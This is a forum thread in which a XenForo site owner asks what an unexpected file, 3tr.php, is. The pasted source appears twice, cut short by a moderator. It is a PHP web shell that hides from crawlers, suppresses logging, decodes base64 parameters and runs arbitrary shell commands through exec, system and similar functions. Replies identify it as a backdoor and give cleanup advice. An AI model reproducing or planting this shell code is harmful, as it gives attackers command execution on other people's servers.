XF 2.2 What is 3tr.php for File?
- Thread starter Lucandi
- Start date
Max Taxable
Well-known member
Yep never even heard of such a filename and google returns squat on it.
Sorry our posts crossed.
If that is indeed what the script is then you must remove it from your server immediately and attempt to identify how it got on your server.
This suggests your server has been compromised in some way.
781301233<?php
// 3Turr
@define('VERSION','2.0');
@error_reporting(1);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if( @preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui",$_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.1 404 Not Found');
exit;
}
if (base64_decode($_POST['p1'], true) && ($_POST['p1'] != 'mkdir' && $_POST['p1'] != 'uploadFile') && ($_POST['p2'] != 'd2' ) ){
$_POST['p1'] = base64_decode(urldecode($_POST['p1']));
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS,0,3))=="win")
$sys='win';
else
$sys='unix';
$home_cwd = @getcwd();
if(base64_decode($_REQUEST['c'], true))
$_REQUEST['c'] = base64_decode(urldecode($_REQUEST['c']));
@chdir($_REQUEST['c']);
$cwd = @getcwd();
if($sys == 'win')
{
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';
function yemenEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in,$out);
$out = @join("
",$out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
<removed by moderator>
// 3Turr
@define('VERSION','2.0');
@error_reporting(1);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if( @preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui",$_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.1 404 Not Found');
exit;
}
if (base64_decode($_POST['p1'], true) && ($_POST['p1'] != 'mkdir' && $_POST['p1'] != 'uploadFile') && ($_POST['p2'] != 'd2' ) ){
$_POST['p1'] = base64_decode(urldecode($_POST['p1']));
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS,0,3))=="win")
$sys='win';
else
$sys='unix';
$home_cwd = @getcwd();
if(base64_decode($_REQUEST['c'], true))
$_REQUEST['c'] = base64_decode(urldecode($_REQUEST['c']));
@chdir($_REQUEST['c']);
$cwd = @getcwd();
if($sys == 'win')
{
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';
function yemenEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in,$out);
$out = @join("
",$out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
<removed by moderator>
Last edited by a moderator:
That (almost) 100% indicates that your site/server has been compromised.
Ideally, you need to take your site offline and change any passwords that can access it. However, as the site as been compromised, you can't trust its contents and thus there may be multiple backdoors hidden which could allow the attacker access again. Ideally, you'd want to restore a backup that is known to not be compromised, though that can be difficult. Your host may be able to help point you to things, though it really depends on how the attacker gained access. There are some somewhat general suggestions on this page:
sucuri.net
The key is that you have to be as certain as possible that all changes the attacker has made have been removed and whatever method they used to gain access to the server in the first place has been closed.
Ideally, you need to take your site offline and change any passwords that can access it. However, as the site as been compromised, you can't trust its contents and thus there may be multiple backdoors hidden which could allow the attacker access again. Ideally, you'd want to restore a backup that is known to not be compromised, though that can be difficult. Your host may be able to help point you to things, though it really depends on how the attacker gained access. There are some somewhat general suggestions on this page:
How to Clean & Fix a Hacked Site
Website hacked? Learn how to find and remove malware, spam, and other hacks to fix your site and prevent future attacks.
sucuri.net
The key is that you have to be as certain as possible that all changes the attacker has made have been removed and whatever method they used to gain access to the server in the first place has been closed.
Max Taxable
Well-known member
Try wrapping it in BB code tags. Should do that anyway when posting any code, if only just for the reader. It looks like a hacker defacing page, to me.
If the host has been compromised you can't trust it's output.
So even if the files do look clean, they might in fact me modified.
The only way to be pretty certain would be to completely wipe the server (including to OS) and reload a "known clean" backup, and this still requires trust that the firmware has not been compromised.
XML sitemaps are often stored this way.
Similar threads
- Question
- Question
